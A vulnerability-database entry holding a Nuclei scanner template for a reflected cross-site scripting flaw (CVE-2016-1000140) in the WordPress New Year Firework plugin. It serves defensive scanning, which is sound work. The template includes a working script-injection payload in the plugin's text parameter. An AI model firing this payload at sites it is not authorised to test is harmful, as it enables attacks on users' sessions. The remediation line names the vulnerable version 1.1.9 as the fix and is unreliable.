Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-1000140
HistoryJul 20, 2021 - 11:16 p.m.

WordPress New Year Firework <=1.1.9 - Cross-Site Scripting

2021-07-2023:16:34
ProjectDiscovery
github.com
2
cve2016
wordpress
xss
wp-plugin
new-year-firework_project

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

46.3%

WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

id: CVE-2016-1000140

info:
  name: WordPress New Year Firework <=1.1.9 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser.
  remediation: |
    Update to the latest version of the WordPress New Year Firework plugin (1.1.9) to mitigate this vulnerability.
  reference:
    - http://www.vapidlabs.com/wp/wp_advisory.php?v=453
    - https://wordpress.org/plugins/new-year-firework
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-1000140
    cwe-id: CWE-79
    epss-score: 0.00119
    epss-percentile: 0.45851
    cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "new-year-firework_project"
    product: "new-year-firework"
    framework: wordpress
  tags: cve2016,cve,wordpress,xss,wp-plugin,new-year-firework_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'New Year Firework ='

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ba5460a812bdae26380e9e935555361ee64d3632f07d311ac7a3999191f372fa0220363661cc6cc59a5b0dbb2ab737003e8cb5e08c863bb263cc9c7cbc0ee6203700:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

46.3%

Related for NUCLEI:CVE-2016-1000140